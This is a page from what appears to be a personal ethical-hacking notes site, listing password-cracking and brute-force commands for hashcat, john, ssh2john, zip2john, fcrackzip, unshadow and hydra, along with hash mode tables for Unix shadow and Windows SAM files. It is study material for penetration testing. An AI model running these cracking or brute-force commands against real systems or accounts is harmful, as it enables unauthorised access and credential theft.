🔐
oneforall
  • Welcome
  • ETHICAL HACKING METHODOLOGY / USUAL AND USEFUL TOOLS
    • Reconnaissance
      • Overview
    • Enumeration
      • Scanning
      • Ports
    • Exploitation
    • Post-exploitation
      • Password cracking
      • File transfers
      • Maintaining access
      • Pivoting
      • Cleaning up & Covering tracks
  • Active Directory
    • Basics
    • Attack vectors
      • Network poisoning
      • SMB services
      • LDAP
      • OSINT
    • Post-compromise
      • Enumeration
        • PowerView
        • Bloodhound
      • Attacks
        • Pass the hash / password
        • Token impersonation
        • Kerberoasting
        • GPP / cPassword
        • Mimikatz
  • WEB
    • TOP 10 OWASP
  • WEB SERVER
    • SQL Injection
    • Authentication
    • OS injection
    • CSRF
  • WIRELESS
    • WPA2 PSK
  • FORENSIC
    • Radare2
    • Obtaining Memory Samples
    • Volatility
    • USB forensic
  • EXPLOIT DEVELOPMENT
    • Buffer Overflow
  • SCRIPTING AND PL
    • HTML
    • C basics
    • Python
      • Libraries & hacking usages
    • Bash basics
      • Hacking usages
    • Powershell basics
    • PHP
  • NETWORK SECURITY
    • Network reminders
    • CCNAv7
      • LAN security concepts
      • Switch security configuration
    • Wireshark
  • MISC
    • VIM basics
    • Metasploit Cheatsheet
    • Common ports & protocols
    • Tmux Cheatsheet
    • Linux reminders
  • STEGANOGRAPHY
    • Steganography
  • Privilege Escalation
    • Linux
    • Windows
  • CRYPTO
    • Encryption
    • Hashing
    • RSA
      • Tools
      • Factorisarion
Powered by GitBook
On this page
  • Hash-identifier
  • Unshadow
  • Hashcat
  • Usage
  • /etc/shadow file
  • SAM file
  • John
  • Usage
  • Crack RSA key
  • ZIP
  • Brute force
  • Hydra

Was this helpful?

  1. ETHICAL HACKING METHODOLOGY / USUAL AND USEFUL TOOLS
  2. Post-exploitation

Password cracking

Hash-identifier

hash-identifier and paste the hash

Unshadow

unshadow passwd.txt shadow.txt > unshadow.txt

Hashcat

Usage

hashcat --help | grep <type_of_hash>
hashcat -m <hash_mode> <hash_file> <wordlist> --force #use CPU in kali VM
hashcat64.exe -m <hash_mode> <hash_file> <wordlist> -O #on Windows, use GPU

/etc/shadow file

 500 | md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5)        | Operating Systems
3200 | bcrypt $2*$, Blowfish (Unix)                     | Operating Systems
7400 | sha256crypt $5$, SHA256(Unix)                    | Operating-Systems
1800 | sha512crypt $6$, SHA512(Unix)                    | Operating-Systems

SAM file

3000 | LM                                               | Operating Systems
1000 | NTLM                                             | Operating Systems

John

Usage

john -wordlist=/usr/share/wordlists/rockyou.txt -format=raw-sha1 hashfile.txt
john --show hashfile.txt

Crack RSA key

locate ssh2john.py
python /usr/share/john/ssh2john.py sshkey.pem > sshkey.pem.hash
john sshkey.pem.hash -wordlist=<wordlist>

ZIP

fcrackzip -u -D -p '<wordlist.txt>' <ch5.zip>

zip2john ch5.zip > ch5.zip.john
john ch5.zip.john

Brute force

Hydra

hydra -l bob -P rockyou.txt http-get://<ip>/protected
hydra -l user -P passlist.txt ftp://<ip>
hydra -l user -P passlist.txt ssh://<ip>
hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.100.206 http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect" -V
PreviousPost-exploitationNextFile transfers

Last updated 4 years ago

Was this helpful?